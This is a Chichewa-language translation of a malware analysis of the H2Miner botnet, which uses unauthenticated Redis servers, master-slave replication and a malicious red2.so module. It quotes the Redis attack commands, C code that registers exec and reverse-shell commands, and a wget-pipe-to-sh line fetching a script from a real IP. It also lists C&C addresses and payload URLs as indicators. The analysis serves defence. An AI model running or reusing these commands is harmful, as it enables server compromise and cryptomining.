Tsiku lapitalo, imodzi mwama seva anga adagwidwa ndi nyongolotsi yofananira. Kufunafuna yankho la funso lakuti "ndi chiyani chimenecho?" Ndapeza nkhani yabwino ndi gulu la Alibaba Cloud Security. Popeza sindinapeze nkhaniyi pa Habré, ndinaganiza zomasulira makamaka kwa inu <3
kulowa
Posachedwa, gulu lachitetezo la Alibaba Cloud latulukira mwadzidzidzi H2Miner. Nyongolotsi yoyipa iyi imagwiritsa ntchito kusowa kwa chilolezo kapena mawu achinsinsi ofooka a Redis ngati zipata zamakina anu, pambuyo pake imagwirizanitsa gawo lake loyipa ndi kapoloyo kudzera mu kulumikizana kwa kapolo-kapolo ndikutsitsa gawo loyipali pamakina omwe akuwukiridwawo ndikuchita zoyipa. malangizo.
M'mbuyomu, kuwukira pamakina anu kunkachitika makamaka pogwiritsa ntchito njira yomwe idakonzedweratu kapena makiyi a SSH omwe adalembedwa pamakina anu wowukirayo atalowa mu Redis. Mwamwayi, njirayi singagwiritsidwe ntchito kawirikawiri chifukwa cha mavuto ndi chilolezo chowongolera kapena chifukwa cha mitundu yosiyanasiyana ya machitidwe. Komabe, njira iyi yotsitsa moduli yoyipa imatha kutsata mwachindunji malamulo a wowukirayo kapena kupeza chipolopolo, chomwe ndi chowopsa kwa dongosolo lanu.
Chifukwa cha kuchuluka kwa ma seva a Redis omwe amapezeka pa intaneti (pafupifupi 1 miliyoni), gulu lachitetezo la Alibaba Cloud, monga chikumbutso chaubwenzi, limalimbikitsa kuti ogwiritsa ntchito asagawane Redis pa intaneti ndikuyang'ana kulimba kwa mapasiwedi awo komanso ngati asokonezedwa. kusankha mwachangu.
H2Miner
H2Miner ndi botnet ya migodi yamakina opangidwa ndi Linux omwe amatha kuwononga dongosolo lanu m'njira zosiyanasiyana, kuphatikiza kusowa kwa chilolezo mu ulusi wa Hadoop, Docker, ndi Redis remote command execution (RCE). Botnet imagwira ntchito potsitsa zolembedwa zoyipa ndi pulogalamu yaumbanda kuti musunge deta yanu, kukulitsa kuwukira mopingasa, ndikusunga kulumikizana kwa malamulo ndi kuwongolera (C&C).
Redis RCE
Chidziwitso pa nkhaniyi chinagawidwa ndi Pavel Toporkov pa ZeroNights 2018. Pambuyo pa mtundu wa 4.0, Redis imathandizira pulogalamu yotsegulira plug-in yomwe imapatsa ogwiritsa ntchito mwayi wokweza kotero mafayilo opangidwa ndi C mu Redis kuti akwaniritse malamulo enieni a Redis. Ntchitoyi, ngakhale yothandiza, imakhala ndi chiwopsezo chomwe, mumayendedwe a master-kapolo, mafayilo amatha kulumikizidwa ndi kapolo kudzera munjira ya fullresync. Izi zitha kugwiritsidwa ntchito ndi wowukira kusamutsa mafayilo oyipa. Kusamutsa kukamalizidwa, owukirawo amakweza gawolo pamwambo wowukiridwa wa Redis ndikuchita lamulo lililonse.
Malware Worm Analysis
Posachedwapa, gulu la chitetezo cha Alibaba Cloud lapeza kuti kukula kwa gulu la H2Miner loyipa la migodi lawonjezeka mwadzidzidzi. Malinga ndi kusanthula, njira zonse zowukira ndi izi:
H2Miner amagwiritsa ntchito RCE Redis pakuwukira kwathunthu. Owukira amayamba kuukira ma seva osatetezedwa a Redis kapena maseva okhala ndi mawu achinsinsi ofooka.
Kenako amagwiritsa ntchito lamulo config set dbfilename red2.so kusintha dzina la fayilo. Pambuyo pa izi, owukirawo amatsatira lamulo slaveof kukhazikitsa adilesi yobwereza ya master-slave host host.
Nthawi yowukiridwa ya Redis ikakhazikitsa kulumikizana kwa kapolo ndi Redis yoyipa yomwe ndi ya wowukirayo, wowukirayo amatumiza gawo lomwe lili ndi kachilomboka pogwiritsa ntchito lamulo la fullresync kuti alumikizitse mafayilo. The red2.so wapamwamba ndiye dawunilodi ku makina anaukira. Owukirawo amagwiritsa ntchito ./red2.so loading module kuti akweze fayiloyi. Gawoli limatha kulamula kuchokera kwa wowukira kapena kuyambitsa kulumikizana kwa reverse (backdoor) kuti mupeze makina owukira.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Pambuyo popereka lamulo loyipa monga / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, wowukirayo adzakhazikitsanso dzina la fayilo yosunga zobwezeretsera ndikutsitsa gawo la dongosolo kuti ayeretse zotsalirazo. Komabe, fayilo ya red2.so ikhalabe pamakina omwe akuwukira. Ogwiritsa ntchito akulangizidwa kuti asamale za kukhalapo kwa fayilo yokayikitsa yotere mufoda ya mawonekedwe awo a Redis.
Kuphatikiza pa kupha njira zina zoyipa kuti abe zinthu, wowukirayo adatsata script yoyipa pakutsitsa ndikutsitsa mafayilo oyipa abinare kuti . Izi zikutanthauza kuti dzina la ndondomeko kapena dzina lachikwatu lomwe lili ndi kinsing pa wolandirayo likhoza kusonyeza kuti makinawo ali ndi kachilomboka.
Malinga ndi zotsatira za uinjiniya, pulogalamu yaumbanda imagwira ntchito izi:
- Kukweza mafayilo ndikuwachita
- Migodi
- Kusunga kulumikizana kwa C&C ndikuchita malamulo owukira
Gwiritsani ntchito mascan kuti mufufuze zakunja kuti muwonjezere kukopa kwanu. Kuonjezera apo, adilesi ya IP ya seva ya C & C imakhala yovuta kwambiri mu pulogalamuyi, ndipo wogwidwayo adzalankhulana ndi seva yolankhulana ya C & C pogwiritsa ntchito zopempha za HTTP, kumene chidziwitso cha zombie (seva yowonongeka) chimadziwika pamutu wa HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Njira zina zowukira
Ma adilesi ndi maulalo ogwiritsidwa ntchito ndi nyongolotsi
/kukonda
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Chizindikiro
Choyamba, Redis sayenera kupezeka pa intaneti ndipo iyenera kutetezedwa ndi mawu achinsinsi. Ndikofunikanso kuti makasitomala ayang'ane kuti palibe fayilo ya red2.so mu bukhu la Redis komanso kuti palibe "kinsing" mu dzina la fayilo / ndondomeko pa wolandira.
Source: www.habr.com